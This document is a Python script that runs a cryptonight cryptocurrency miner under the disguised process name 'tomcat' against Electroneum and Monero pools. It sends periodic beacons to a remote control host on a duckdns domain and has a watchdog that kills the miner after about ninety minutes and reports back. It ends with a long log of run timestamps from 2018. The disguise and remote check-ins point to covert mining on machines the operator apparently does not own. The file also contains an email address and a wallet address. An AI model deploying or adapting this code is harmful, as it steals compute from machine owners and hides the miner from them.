import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:14:06.321785
#2018-02-17 17:02:01.931851
#2018-02-17 18:49:03.549733
#2018-02-17 20:37:06.093200
#2018-02-17 22:23:06.444078
#2018-02-18 00:07:06.500195
#2018-02-18 01:57:06.962537
#2018-02-18 03:45:02.433439
#2018-02-18 05:32:07.397574
#2018-02-18 07:24:07.432816
#2018-02-18 09:12:06.539999
#2018-02-18 10:58:02.134395
#2018-02-18 12:45:03.114744
#2018-02-18 14:34:01.519147
#2018-02-18 16:24:01.936836
#2018-02-18 18:13:05.016628
#2018-02-18 19:58:07.005120
#2018-02-18 21:45:01.418129
#2018-02-18 23:34:05.180839
#2018-02-19 01:20:04.496868
#2018-02-19 03:08:07.628718
#2018-02-19 04:53:05.083596
#2018-02-19 06:39:07.635343
#2018-02-19 08:30:08.383114
#2018-02-19 10:19:05.740009
#2018-02-19 12:07:08.082158
#2018-02-19 13:53:05.597137
#2018-02-19 15:43:06.482868
#2018-02-19 17:31:08.044579
#2018-02-19 19:18:02.179310
#2018-02-19 21:06:04.728745
#2018-02-19 22:53:01.355539
#2018-02-20 00:37:06.088739
#2018-02-20 02:26:05.590824
#2018-02-20 04:16:02.040569
#2018-02-20 05:58:04.737273
#2018-02-20 07:43:08.649349
#2018-02-20 09:28:05.984206
#2018-02-20 11:11:09.539317
#2018-02-20 12:58:07.434330
#2018-02-20 14:42:11.656339
#2018-02-20 16:27:08.216231
#2018-02-20 18:13:04.354378
#2018-02-20 20:04:07.836148
#2018-02-20 21:52:04.517954
#2018-02-20 23:33:05.682248
#2018-02-21 01:17:02.213719
#2018-02-21 03:04:06.650159
#2018-02-21 04:52:06.143110
#2018-02-21 06:39:07.301275
#2018-02-21 08:25:05.396810
#2018-02-21 08:26:01.443491
#2018-02-21 10:11:01.579406
#2018-02-21 11:45:04.740412
#2018-02-21 13:19:08.257204
#2018-02-21 14:52:07.562429
#2018-02-21 16:27:09.571470
#2018-02-21 18:05:10.465529
#2018-02-21 19:34:07.153843
#2018-02-21 21:09:04.537231
#2018-02-21 22:43:09.035637
#2018-02-22 00:21:05.244113
#2018-02-22 01:52:04.578510
#2018-02-22 03:27:01.742391
#2018-02-22 04:59:03.884675
#2018-02-22 06:29:08.337638
#2018-02-22 08:04:07.653201
#2018-02-22 09:40:11.008038
#2018-02-22 11:10:10.600304
#2018-02-22 12:44:06.059468
#2018-02-22 14:16:01.579297
#2018-02-22 15:51:05.620685
#2018-02-22 17:23:05.136160
#2018-02-22 18:56:07.285210
#2018-02-22 20:35:04.885905
#2018-02-22 22:04:01.482260
#2018-02-22 23:38:04.910776
#2018-02-23 01:10:01.332791
#2018-02-23 02:43:06.499402
#2018-02-23 04:19:01.757674
#2018-02-23 05:52:04.126834
#2018-02-23 07:27:08.101953
#2018-02-23 09:19:06.673695
#2018-02-23 11:11:05.923770
#2018-02-23 12:33:08.285894
#2018-02-23 13:59:01.658854
#2018-02-23 15:32:05.456664
#2018-02-23 17:06:08.309695
#2018-02-23 18:36:06.363505
#2018-02-23 20:17:04.222552
#2018-02-23 21:53:03.677184
#2018-02-23 23:31:05.443610
#2018-02-24 01:06:01.919107
#2018-02-24 02:44:08.010857
#2018-02-24 04:24:04.251946
#2018-02-24 06:10:06.604156
#2018-02-24 07:57:04.336192
#2018-02-24 09:41:04.937607
#2018-02-24 11:37:01.897297
#2018-02-24 13:27:05.416991
#2018-02-24 15:16:06.255721
#2018-02-24 17:05:01.442064
#2018-02-24 18:55:08.526998
#2018-02-24 20:42:05.605274
#2018-02-24 22:53:03.633107
#2018-02-25 02:13:02.293684
#2018-02-25 05:56:05.309170
#2018-02-25 11:38:01.702463